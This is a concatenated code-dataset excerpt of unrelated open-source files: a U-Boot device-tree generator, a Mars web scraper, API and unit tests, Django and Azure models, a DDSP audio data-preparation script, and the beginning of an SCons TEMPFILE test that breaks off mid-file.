                self.Out(';\n')
            self.Out('};\n')

    def GenerateTables(self):
        """Generate device definitions for the platform data

        This writes out C platform data initialisation data and
        U_BOOT_DEVICE() declarations for each valid node. See the
        documentation in README.of-plat for more information.
        """
        self.Out('#include <common.h>\n')
        self.Out('#include <dm.h>\n')
        self.Out('#include <dt-structs.h>\n')
        self.Out('\n')
        node_txt_list = []
        for node in self._valid_nodes:
            struct_name = self.GetCompatName(node)
            var_name = Conv_name_to_c(node.name)
            self.Buf('static struct %s%s %s%s = {\n' %
                (STRUCT_PREFIX, struct_name, VAL_PREFIX, var_name))
            for pname, prop in node.props.items():
                if pname in PROP_IGNORE_LIST or pname[0] == '#':
                    continue
                ptype = TYPE_NAMES[prop.type]
                member_name = Conv_name_to_c(prop.name)
                self.Buf('\t%s= ' % TabTo(3, '.' + member_name))

                # Special handling for lists
                if type(prop.value) == list:
                    self.Buf('{')
                    vals = []
                    # For phandles, output a reference to the platform data
                    # of the target node.
                    if self.IsPhandle(prop):
                        # Process the list as pairs of (phandle, id)
                        it = iter(prop.value)
                        for phandle_cell, id_cell in zip(it, it):
                            phandle = fdt_util.fdt32_to_cpu(phandle_cell)
                            id = fdt_util.fdt32_to_cpu(id_cell)
                            target_node = self._phandle_node[phandle]
                            name = Conv_name_to_c(target_node.name)
                            vals.append('{&%s%s, %d}' % (VAL_PREFIX, name, id))
                    else:
                        for val in prop.value:
                            vals.append(self.GetValue(prop.type, val))
                    self.Buf(', '.join(vals))
                    self.Buf('}')
                else:
                    self.Buf(self.GetValue(prop.type, prop.value))
                self.Buf(',\n')
            self.Buf('};\n')

            # Add a device declaration
            self.Buf('U_BOOT_DEVICE(%s) = {\n' % var_name)
            self.Buf('\t.name\t\t= "%s",\n' % struct_name)
            self.Buf('\t.platdata\t= &%s%s,\n' % (VAL_PREFIX, var_name))
            self.Buf('\t.platdata_size\t= sizeof(%s%s),\n' %
                     (VAL_PREFIX, var_name))
            self.Buf('};\n')
            self.Buf('\n')

            # Output phandle target nodes first, since they may be referenced
            # by others
            if 'phandle' in node.props:
                self.Out(''.join(self.GetBuf()))
            else:
                node_txt_list.append(self.GetBuf())

        # Output all the nodes which are not phandle targets themselves, but
        # may reference them. This avoids the need for forward declarations.
        for node_txt in node_txt_list:
            self.Out(''.join(node_txt))
# NOTE(review): this guard is a no-op -- the option parsing and generation
# below run on import as well as when executed as a script.
if __name__ != "__main__":
    pass

parser = OptionParser()
parser.add_option('-d', '--dtb-file', action='store',
                  help='Specify the .dtb input file')
parser.add_option('--include-disabled', action='store_true',
                  help='Include disabled nodes')
parser.add_option('-o', '--output', action='store', default='-',
                  help='Select output filename')
(options, args) = parser.parse_args()

if not args:
    raise ValueError('Please specify a command: struct, platdata')

# Scan the device tree once, then run each requested generation command.
plat = DtbPlatdata(options.dtb_file, options)
plat.ScanDtb()
plat.ScanTree()
plat.SetupOutput(options.output)
structs = plat.ScanStructs()

for cmd in args[0].split(','):
    if cmd == 'struct':
        plat.GenerateStructs(structs)
    elif cmd == 'platdata':
        plat.GenerateTables()
    else:
        raise ValueError("Unknown command '%s': (use: struct, platdata)" % cmd)
df788209b8b1bada71349320ba8150284952b204 | 4,555 | py | Python | mission_to_mars.py | ARMcK-hub/web-scraping-challenge | 9ced38c2e463271b8d1342713ea3e7a6b6bdba60 | [
"MIT"
] | null | null | null | mission_to_mars.py | ARMcK-hub/web-scraping-challenge | 9ced38c2e463271b8d1342713ea3e7a6b6bdba60 | [
"MIT"
] | 3 | 2022-02-24T08:26:31.000Z | 2022-02-28T05:40:13.000Z | mission_to_mars.py | ARMcK-hub/Mission-to-Mars | 20d470b08a7df554f8d26f248694574a2e190128 | [
"MIT"
] | null | null | null | '''
Mission to Mars Web Scrape Script
Author: Andrew McKinney
Creation Date: 2020-02-14
'''
# importing dependencies
from bs4 import BeautifulSoup
import requests
import pandas as pd
from splinter import Browser
def houston():
    """Scrape several Mars-related web pages and return the results.

    Returns a dict with news title/paragraph, featured image URL, latest
    weather tweet text, a facts table as HTML, and hemisphere image info.
    NOTE(review): depends on the live layout of each site; selectors may
    need updating when those pages change.
    """
    ### Top NASA new title and paragraph
    # defining web url
    # NOTE: THIS HAS PROBLEMS WITH CALLING THIS URL RECURRENT AND DOES NOT GET BACK THE ACTUAL HTML AND GETS CSS INSTEAD
    url_nasa_news = 'https://mars.nasa.gov/news'
    print(f'Visiting {url_nasa_news}')

    # creating splinter browser and visint url
    executable_path = {'executable_path': 'chromedriver.exe'}
    browser = Browser('chrome', **executable_path, headless=True)
    browser.visit(url_nasa_news)
    html = browser.html

    # Create BeautifulSoup object; parse with 'html.parser'
    soup = BeautifulSoup(html, 'html.parser')

    # Handeling unknown, internal BS4 errors that occur on 1st run
    # (bare except: retries the whole fetch exactly once with a new browser)
    try:
        news_title = soup.find('div', class_='content_title').text.strip()
        news_para = soup.find('div', class_='article_teaser_body').text.strip()
    except:
        executable_path = {'executable_path': 'chromedriver.exe'}
        browser = Browser('chrome', **executable_path, headless=True)
        browser.visit(url_nasa_news)
        html = browser.html
        soup = BeautifulSoup(html, 'html.parser')
        news_title = soup.find('div', class_='content_title').text.strip()
        news_para = soup.find('div', class_='article_teaser_body').text.strip()
    print('Done')

    ### NASA featured image
    # defining web url
    url_nasa_imgs = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'
    print(f'Visiting {url_nasa_imgs}')

    # visiting url
    browser.visit(url_nasa_imgs)
    html = browser.html

    # Create BeautifulSoup object; parse with 'html.parser'
    soup = BeautifulSoup(html, 'html.parser')
    featured_image_url = 'https://www.jpl.nasa.gov' + soup.find('a', class_='button fancybox')['data-fancybox-href']
    print('Done')

    ### Mars Weather
    # defining web url
    url_mars_weath = 'https://twitter.com/marswxreport'
    print(f'Requesting {url_mars_weath}')

    # get html using requests, browser scraping does not work for this
    response = requests.get(url_mars_weath).text

    # Create BeautifulSoup object; parse with 'html.parser'
    soup = BeautifulSoup(response, 'html.parser')
    mars_weather = soup.find('p', class_='TweetTextSize').text.replace('\n', ' ').split(' hPapic')[0]
    print('Done')

    ### Mars Facts
    # defining web url
    url_mars_fact = 'https://space-facts.com/mars/'
    print(f'Reading {url_mars_fact}')

    # scraping with pandas
    mars_facts = pd.read_html(url_mars_fact)[1].drop(columns={'Earth'})
    mars_facts_html = mars_facts.to_html()
    print('Done')

    ### Mars Hem Images
    url_main_mars_images = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'
    print(f'Visiting {url_main_mars_images}')

    # soupifying main page
    browser.visit(url_main_mars_images)
    html = browser.html
    soup = BeautifulSoup(html, 'html.parser')

    # creating image list for searches
    image_headers = soup.find_all('div', class_='description')
    image_list = []
    for items in image_headers:
        image_list.append(items.h3.text)

    # creating empty ouptput dictionary
    mars_hem_dict = []

    #cycling through image list to navigate website and scrape info
    for image in image_list:

        # navigating to image page
        browser.click_link_by_partial_text(image)

        # resetting html object to current page
        html = browser.html
        soup = BeautifulSoup(html, 'html.parser')

        # scraping items per image
        title = soup.find('h2', class_='title').text.strip()
        img_url = 'https://astrogeology.usgs.gov/' + soup.find('img', class_='wide-image')['src']
        dl_img_url = soup.find('a', text='Original')['href']

        # appending image items to dictionary
        mars_hem_dict.append({'title' : title, 'img_url' : img_url ,'dl_img_url' : dl_img_url})

        # navigating back to master page list
        browser.back()
    print('Done')

    # bundle every scraped item into one dict for the caller
    to_houston = ({
        'news_title' : news_title,
        'news_para' : news_para,
        'featured_image_url' : featured_image_url,
        'mars_weather' : mars_weather,
        'mars_facts_html' : mars_facts_html,
        'mars_hem_dict' : mars_hem_dict
    })

    return to_houston
bd8b49bbdffdfe9a682449700fdcea41308a9520 | 5,371 | py | Python | interfaceTest/testCase/user/testAddAddress.py | liberjiang/interface_framework | ab25e93c1e079da3df8441fca620927061aae252 | [
"Apache-2.0"
] | null | null | null | interfaceTest/testCase/user/testAddAddress.py | liberjiang/interface_framework | ab25e93c1e079da3df8441fca620927061aae252 | [
"Apache-2.0"
] | null | null | null | interfaceTest/testCase/user/testAddAddress.py | liberjiang/interface_framework | ab25e93c1e079da3df8441fca620927061aae252 | [
"Apache-2.0"
] | null | null | null | import unittest
import paramunittest
import readConfig as readConfig
from common import Log as Log
from common import common
from common import configHttp as ConfigHttp
from common import businessCommon
addAddress_xls = common.get_xls("userCase.xlsx", "addAddress")
localReadConfig = readConfig.ReadConfig()
configHttp = ConfigHttp.ConfigHttp()
@paramunittest.parametrized(*addAddress_xls)
class AddAddress(unittest.TestCase):
    """Data-driven test for the addAddress interface.

    Each row of the 'addAddress' sheet in userCase.xlsx becomes one
    parameterized test case via paramunittest.
    """

    def setParameters(self, case_name, method, token, sex, fname, lname, tel, standby_tel, address1, address2, city, state, postcode, country_id, tax_number, company, fax, is_default, result, code, msg):
        """Store one spreadsheet row's values on the test instance.

        Every value is coerced to str so it can be posted directly as a
        request parameter. 'result' selects the expected outcome ('0' =
        success, '1' = failure); 'code'/'msg' are the expected response
        code and message.
        """
        self.case_name = str(case_name)
        self.method = str(method)
        self.token = str(token)
        self.sex = str(sex)
        self.fname = str(fname)
        self.lname = str(lname)
        self.tel = str(tel)
        self.standby_tel = str(standby_tel)
        self.address1 = str(address1)
        self.address2 = str(address2)
        self.city = str(city)
        self.state = str(state)
        self.postcode = str(postcode)
        self.country_id = str(country_id)
        self.tax_number = str(tax_number)
        self.company = str(company)
        self.fax = str(fax)
        self.is_default = str(is_default)
        self.result = str(result)
        self.code = str(code)
        self.msg = str(msg)
        # Parsed JSON of the last response; filled in by checkResult().
        self.info = None

    def description(self):
        """Return the case name used as this test's description."""
        # Bug fix: this previously evaluated self.case_name and discarded
        # it, so the method always returned None.
        return self.case_name

    def setUp(self):
        """Obtain a logger and log in to get a fresh session token."""
        self.log = Log.MyLog.get_log()
        self.logger = self.log.get_logger()
        self.login_token = businessCommon.login()

    def testAddAddress(self):
        """Send the addAddress request built from this row's parameters."""
        # set url
        self.url = common.get_url_from_xml('addAddress')
        configHttp.set_url(self.url)

        # get token: '0' = use the fresh login token, '1' = use the token
        # from the config file, anything else = use the raw sheet value.
        if self.token == '0':
            token = self.login_token
        elif self.token == '1':
            token = localReadConfig.get_headers("TOKEN_U")
        else:
            token = self.token

        # set headers
        header = {"token": str(token)}
        configHttp.set_headers(header)

        # set params
        data = {"sex": self.sex,
                "fname": self.fname,
                "lname": self.lname,
                "tel": self.tel,
                "standby_tel": self.standby_tel,
                "address1": self.address1,
                "address2": self.address2,
                "city": self.city,
                "state": self.state,
                "postcode": self.postcode,
                "country_id": self.country_id,
                "tax_number": self.tax_number,
                "company": self.company,
                "fax": self.fax,
                "is_default": self.is_default}
        configHttp.set_data(data)

        # test interface
        self.return_json = configHttp.post()

        # check result
        self.checkResult()

    def tearDown(self):
        """Log out and record this case's outcome in the report."""
        # logout
        businessCommon.logout(self.login_token)
        self.log.build_case_line(self.case_name, self.info['code'], self.info['msg'])

    def checkResult(self):
        """Compare the interface response against the expected sheet values."""
        self.info = self.return_json.json()
        common.show_return_msg(self.return_json)
        if self.result == '0':
            # Success path: the echoed address fields must match the input.
            self.assertEqual(self.info['code'], self.code)
            self.assertEqual(self.info['msg'], self.msg)
            self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'sex'), self.sex)
            self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'fname'), self.fname)
            self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'lname'), self.lname)
            self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'tel'), self.tel)
            self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'address1'), self.address1)
            self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'city'), self.city)
            self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'state'), self.state)
            self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'postcode'), self.postcode)
            self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'countryId'), self.country_id)
        if self.result == '1':
            # Failure path: only the code and message are checked.
            self.assertEqual(self.info['code'], self.code)
            self.assertEqual(self.info['msg'], self.msg)
1ba7b97f7bceba8dcb82401b0dafd23b7f22bc66 | 1,165 | py | Python | polls/migrations/0001_initial.py | Etuloser/mysite | d7e50749581d186f74c30744dfd70ce4bf96524a | [
"BSD-3-Clause"
] | null | null | null | polls/migrations/0001_initial.py | Etuloser/mysite | d7e50749581d186f74c30744dfd70ce4bf96524a | [
"BSD-3-Clause"
] | null | null | null | polls/migrations/0001_initial.py | Etuloser/mysite | d7e50749581d186f74c30744dfd70ce4bf96524a | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.0.1 on 2018-01-25 02:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations (see header); avoid editing
    # the operations below once this migration has been applied anywhere.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Choice',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('choice_text', models.CharField(max_length=200)),
                ('votes', models.IntegerField(default=0)),
            ],
        ),
        migrations.CreateModel(
            name='Question',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('question_text', models.CharField(max_length=200)),
                ('pub_date', models.DateTimeField(verbose_name='date published')),
            ],
        ),
        migrations.AddField(
            model_name='choice',
            name='question',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Question'),
        ),
    ]
| 31.486486 | 114 | 0.577682 |
c5d009e000f62ee6cf4552d7da9766f100d0bbab | 3,083 | py | Python | ddsp/training/data_preparation/prepare_tfrecord.py | jeonghopark/ddsp | 6858ba7df1d6bf6c2208e19bafd8aa5c473c57eb | [
"Apache-2.0"
] | 2 | 2020-02-07T01:03:29.000Z | 2020-04-24T13:53:05.000Z | ddsp/training/data_preparation/prepare_tfrecord.py | jeonghopark/ddsp | 6858ba7df1d6bf6c2208e19bafd8aa5c473c57eb | [
"Apache-2.0"
] | null | null | null | ddsp/training/data_preparation/prepare_tfrecord.py | jeonghopark/ddsp | 6858ba7df1d6bf6c2208e19bafd8aa5c473c57eb | [
"Apache-2.0"
] | 2 | 2020-04-07T06:10:15.000Z | 2020-05-16T04:36:10.000Z | # Copyright 2020 The DDSP Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
r"""Create a TFRecord dataset from audio files.
Usage:
====================
ddsp_prepare_tfrecord \
--input_audio_filepatterns=/path/to/wavs/*wav,/path/to/mp3s/*mp3 \
--output_tfrecord_path=/path/to/output.tfrecord \
--num_shards=10 \
--alsologtostderr
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
from ddsp.training.data_preparation.prepare_tfrecord_lib import prepare_tfrecord
import tensorflow.compat.v1 as tf
# Command-line flags for the TFRecord preparation pipeline.  All values are
# read in run() below and forwarded to prepare_tfrecord().
FLAGS = flags.FLAGS
flags.DEFINE_list(
    'input_audio_filepatterns', [],
    'List of filepatterns to glob for input audio files.')
flags.DEFINE_string(
    'output_tfrecord_path', None,
    'The prefix path to the output TFRecord. Shard numbers will be added to '
    'actual path(s).')
flags.DEFINE_integer(
    'num_shards', None,
    'The number of shards to use for the TFRecord. If None, this number will '
    'be determined automatically.')
flags.DEFINE_integer(
    'sample_rate', 16000,
    'The sample rate to use for the audio.')
flags.DEFINE_integer(
    'frame_rate', 250,
    'The frame rate to use for f0 and loudness features. If set to 0, '
    'these features will not be computed.')
flags.DEFINE_float(
    'example_secs', 4,
    'The length of each example in seconds. Input audio will be split to this '
    'length using a sliding window. If None, each full piece of audio will be '
    'used as an example.')
flags.DEFINE_float(
    'sliding_window_hop_secs', 1,
    'The hop size in seconds to use when splitting audio into constant-length '
    'examples.')
flags.DEFINE_list(
    'pipeline_options', '--runner=DirectRunner',
    'A comma-separated list of command line arguments to be used as options '
    'for the Beam Pipeline.')
def run():
  """Expand the input file patterns and write the TFRecord dataset.

  Reads all pipeline parameters from FLAGS and delegates the actual work
  to prepare_tfrecord().
  """
  # Flatten the glob results for every user-supplied pattern into one list.
  audio_paths = [
      path
      for pattern in FLAGS.input_audio_filepatterns
      for path in tf.io.gfile.glob(pattern)
  ]
  prepare_tfrecord(
      audio_paths,
      FLAGS.output_tfrecord_path,
      num_shards=FLAGS.num_shards,
      sample_rate=FLAGS.sample_rate,
      frame_rate=FLAGS.frame_rate,
      window_secs=FLAGS.example_secs,
      hop_secs=FLAGS.sliding_window_hop_secs,
      pipeline_options=FLAGS.pipeline_options)
def main(unused_argv):
  """absl.app entry point: ignores positional CLI args and calls run()."""
  run()
def console_entry_point():
  """Entry point for the pip-installed console script.

  Forces TF1-compatible behavior before handing control to absl.app.
  """
  tf.disable_v2_behavior()
  app.run(main)
if __name__ == '__main__':
console_entry_point()
| 30.524752 | 80 | 0.733377 |
f7b503daa7da583c38d3832b58cd3f503df2ce44 | 223 | py | Python | tests/test_linotype.py | techdragon/linotype | 457915c0d2e895c235471a7a0ab32710bd9a8de5 | [
"BSD-2-Clause"
] | null | null | null | tests/test_linotype.py | techdragon/linotype | 457915c0d2e895c235471a7a0ab32710bd9a8de5 | [
"BSD-2-Clause"
] | null | null | null | tests/test_linotype.py | techdragon/linotype | 457915c0d2e895c235471a7a0ab32710bd9a8de5 | [
"BSD-2-Clause"
] | null | null | null |
from click.testing import CliRunner
from linotype.__main__ import main
def test_main():
    """Invoking `main` with no arguments prints an empty tuple and exits 0."""
    outcome = CliRunner().invoke(main, [])
    assert outcome.exit_code == 0
    assert outcome.output == '()\n'
| 17.153846 | 36 | 0.67713 |
9043b9f7990a9df2e0599006a628dcfbe512c534 | 1,182 | py | Python | azure/mgmt/network/v2016_09_01/models/effective_network_security_group_list_result.py | EnjoyLifeFund/Debian_py36_packages | 1985d4c73fabd5f08f54b922e73a9306e09c77a5 | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 1 | 2022-01-25T22:52:58.000Z | 2022-01-25T22:52:58.000Z | azure/mgmt/network/v2016_09_01/models/effective_network_security_group_list_result.py | EnjoyLifeFund/Debian_py36_packages | 1985d4c73fabd5f08f54b922e73a9306e09c77a5 | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | azure/mgmt/network/v2016_09_01/models/effective_network_security_group_list_result.py | EnjoyLifeFund/Debian_py36_packages | 1985d4c73fabd5f08f54b922e73a9306e09c77a5 | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class EffectiveNetworkSecurityGroupListResult(Model):
    """Response for list effective network security groups API service call.

    :param value: A list of effective network security groups.
    :type value:
     list[~azure.mgmt.network.v2016_09_01.models.EffectiveNetworkSecurityGroup]
    :param next_link: The URL to get the next set of results.
    :type next_link: str
    """

    # Maps Python attribute names to the wire-format keys/types used by the
    # msrest serializer.
    _attribute_map = {
        'value': {'key': 'value', 'type': '[EffectiveNetworkSecurityGroup]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, value=None, next_link=None):
        # Initialize the msrest Model base class so its (de)serialization
        # machinery is set up before assigning our own attributes.
        super(EffectiveNetworkSecurityGroupListResult, self).__init__()
        self.value = value
        self.next_link = next_link
| 35.818182 | 79 | 0.617597 |
16017decf0baaada2d9d5472a71a8503188fa41a | 2,539 | py | Python | CS116/a06-j4mai/a06-j4mai/a06q2.py | JohnMai1994/CS116-2018_Winter_Term | dc95e63b9b4ff853c0bb19432dbd09512d4740a1 | [
"MIT"
] | null | null | null | CS116/a06-j4mai/a06-j4mai/a06q2.py | JohnMai1994/CS116-2018_Winter_Term | dc95e63b9b4ff853c0bb19432dbd09512d4740a1 | [
"MIT"
] | null | null | null | CS116/a06-j4mai/a06-j4mai/a06q2.py | JohnMai1994/CS116-2018_Winter_Term | dc95e63b9b4ff853c0bb19432dbd09512d4740a1 | [
"MIT"
] | null | null | null | ##===============================================
## Jiadong Mai (20557203)
## CS 116 Winter 2018
## Assignment 06, Question 2
##===============================================
import check
# Question 2
# find_bigger(ints) consumes a (listof Int), ints, and returns a (listof Int)
# which values in the list that are bigger than all values that came before
# in the list
# find_bigger: (listof Int) -> (listof Int)
# Examples:
# find_bigger([0, 4, 5, 4]) => [0, 4, 5]
# find_bigger([1, 2, 4, 4]) => [1, 2, 4]
# find_bigger([-2, -4, -4, -1]) => [-2, -1]
# find_bigger([]) => []
def find_bigger(ints):
    """Return the values in ints that exceed every value before them.

    The first element is always kept (nothing precedes it); thereafter a
    value is kept only if it is strictly greater than the running maximum.

    Args:
        ints: list of int (may be empty).

    Returns:
        list of int: the strictly-increasing "record" values, in order.

    Examples:
        find_bigger([0, 4, 5, 4])   => [0, 4, 5]
        find_bigger([-2, -4, -4, -1]) => [-2, -1]
        find_bigger([])             => []
    """
    if not ints:
        return []
    result = [ints[0]]
    max_num = ints[0]
    # A value equal to the current maximum is NOT a new record, so use '>'.
    for k in ints[1:]:
        if k > max_num:
            max_num = k
            result.append(k)
    return result
# Tests (uses the course-provided `check` module):
# Test1: empty list returns empty list
check.expect('empty', find_bigger([]), [])
# Test2: strictly/weakly increasing input -- every new maximum is kept
check.expect('Increase Order1', find_bigger([1,2,3,4,5,6,7]), [1,2,3,4,5,6,7])
check.expect('Increase Order2', find_bigger([1,3,3,4,6,6,8]), [1,3,4,6,8])
check.expect('Increase Order3', find_bigger([1,2,4,5,8,10]), [1,2,4,5,8,10])
check.expect('Increase Order4', find_bigger([1,5,8,12,33,99]), [1,5,8,12,33,99])
check.expect('Increase Order5', find_bigger([1,15,15,15,90]), [1,15,90])
check.expect('Increase Order6', find_bigger([1,5,6,7]), [1,5,6,7])
# Test3: inputs whose first element is the overall maximum -- only it is kept
# (note: some of these are not strictly decreasing, but no later value
# exceeds the first, so the result is the same)
check.expect('Decreasing Order1', find_bigger([9,8,7,6,5,4,3]), [9])
check.expect('Decreasing Order2', find_bigger([19,7,4,2]), [19])
check.expect('Decreasing Order3', find_bigger([99,55,32,32,12,0]), [99])
check.expect('Decreasing Order4', find_bigger([87,4,3,67,3]), [87])
check.expect('Decreasing Order5', find_bigger([9,8,8,8,8,8,8]), [9])
check.expect('Decreasing Order6', find_bigger([9,8,2,9,4]), [9])
# Test4: mixed up-down-up order -- only new running maxima are kept
check.expect('Up-Down-UP Order1', find_bigger([2,6,9,8,7,7,5,8,10]), [2,6,9,10])
check.expect('Up-Down-UP Order2', find_bigger([2,19,7,5,100,101]), [2,19,100,101])
check.expect('Up-Down-UP Order3', find_bigger([2,20,21,20,21,22]), [2,20,21,22])
# Test5: all values equal -- ties are not new maxima, only the first is kept
check.expect('All Same', find_bigger([2,2,2,2,2]), [2])
check.expect('All Same', find_bigger([5,5,5]), [5])
# Test6: examples from the assignment hand-out
check.expect('Sample Question1', find_bigger([0, 4, 5, 4]), [0,4,5])
check.expect('Sample Question2', find_bigger([1,2,4,4]), [1,2,4])
check.expect('Sample Question3', find_bigger([-2,-4,-4,-1]), [-2,-1])
| 40.301587 | 82 | 0.587239 |
b40bb74f7993fda1dd802c692002947f60e3619b | 499 | py | Python | arts-main/arts_core/migrations/0006_auto_20200211_1621.py | conix-center/arts | 3ee48a4de49be3c6df744673581720d3eeaa9923 | [
"BSD-3-Clause"
] | 3 | 2022-01-25T16:36:19.000Z | 2022-03-04T06:00:16.000Z | arts-main/arts_core/migrations/0006_auto_20200211_1621.py | conix-center/arts | 3ee48a4de49be3c6df744673581720d3eeaa9923 | [
"BSD-3-Clause"
] | 8 | 2020-09-17T18:13:47.000Z | 2022-02-23T20:55:59.000Z | arts-main/arts_core/migrations/0006_auto_20200211_1621.py | conix-center/arts | 3ee48a4de49be3c6df744673581720d3eeaa9923 | [
"BSD-3-Clause"
] | 1 | 2020-11-12T09:34:14.000Z | 2020-11-12T09:34:14.000Z | # Generated by Django 3.0.3 on 2020-02-11 16:21
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: allow Module.parent to be blank/null.

    Redefines the ForeignKey to arts_core.Runtime with blank=True and
    null=True; deletion of the referenced Runtime cascades.
    """

    # Must be applied after the previous auto migration for arts_core.
    dependencies = [
        ('arts_core', '0005_auto_20200210_1706'),
    ]

    operations = [
        migrations.AlterField(
            model_name='module',
            name='parent',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='arts_core.Runtime'),
        ),
    ]
| 24.95 | 128 | 0.647295 |
4fcb674126a49190b28d9266b7075c64142f668f | 999 | py | Python | tspetl/stock_tool.py | jdgwartney/tsp-etl | 70540d3d13261849af512d97c153fc4f1e414bf5 | [
"Apache-2.0"
] | null | null | null | tspetl/stock_tool.py | jdgwartney/tsp-etl | 70540d3d13261849af512d97c153fc4f1e414bf5 | [
"Apache-2.0"
] | null | null | null | tspetl/stock_tool.py | jdgwartney/tsp-etl | 70540d3d13261849af512d97c153fc4f1e414bf5 | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2016 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from tspetl import ETLTool
class StockTool(ETLTool):
    """ETL tool stub for collecting stock price and volume.

    Registers itself under the name 'stock'; run() is not implemented yet
    (the help string advertises it as a future release).
    """

    def __init__(self):
        super(StockTool, self).__init__()

    @property
    def name(self):
        # Sub-command name used to select this tool on the CLI.
        return 'stock'

    @property
    def help(self):
        # One-line description shown in the CLI help output.
        return 'Collects stock price and volume (Future Release)'

    def add_parser(self, sub_parser):
        # No tool-specific arguments yet; defer to the base class.
        super(StockTool, self).add_parser(sub_parser)

    def run(self, args):
        # Not implemented yet -- placeholder for the future release.
        pass
| 27 | 74 | 0.706707 |
c1a3cfa16a65cf4e0bc781c28ab20ed788c7f249 | 2,600 | py | Python | 1705/351/tempfiletest.py | bdbaddog/dummy-for-migration-attachments | ad3b46d50b4c4b5e79363ae2fdcab3f15e1435de | [
"MIT"
] | null | null | null | 1705/351/tempfiletest.py | bdbaddog/dummy-for-migration-attachments | ad3b46d50b4c4b5e79363ae2fdcab3f15e1435de | [
"MIT"
] | null | null | null | 1705/351/tempfiletest.py | bdbaddog/dummy-for-migration-attachments | ad3b46d50b4c4b5e79363ae2fdcab3f15e1435de | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"

"""
Put scons TEMPFILE support through some of its paces
"""

import os
import stat

import TestSCons

test = TestSCons.TestSCons()

# Build a small helper "compiler" script inside the workspace.  It reads the
# tempfile named by its single @-prefixed argument and writes the remainder
# of the tempfile's contents to the output file named by its first word.
binPath = ['bin dir']
binName = ['testme.py']
test.subdir( binPath )
binFullName = os.path.normpath( binPath[0] + '/' + binName[0] )
test.write(binPath + binName, """\
#!/usr/bin/env python
import sys
if len( sys.argv ) != 2 :
    print( 'ERROR: expecting one and only one argument!' )
f = open( sys.argv[1][1:], 'r' )
contents = f.read()
f.close()
outFile, rest = contents.split( ' ' , 1 )
f = open( outFile, 'w' )
f.write( rest.strip() )
f.close()
""")

# Make the helper executable.  NOTE: the original used the Python 2-only
# octal literal 0111, which is a SyntaxError on Python 3; 0o111 is the
# equivalent literal accepted by both Python 2.6+ and Python 3.
testme_py = test.workpath(binFullName)
st = os.stat(testme_py)
os.chmod(testme_py, st[stat.ST_MODE]|0o111)

# Generate many small source files so the command line is guaranteed to
# exceed MAXLINELENGTH and force TEMPFILE usage.
sourcePath = 'input dir'
sourceName = 'inputFile%d'
numFiles = 100
sourceTemplate = os.path.normpath( '%s/%s' % (sourcePath, sourceName) )
test.subdir( [sourcePath] )
test.write('SConstruct', """
import os
env = Environment(
    BUILDBIN = "%s",
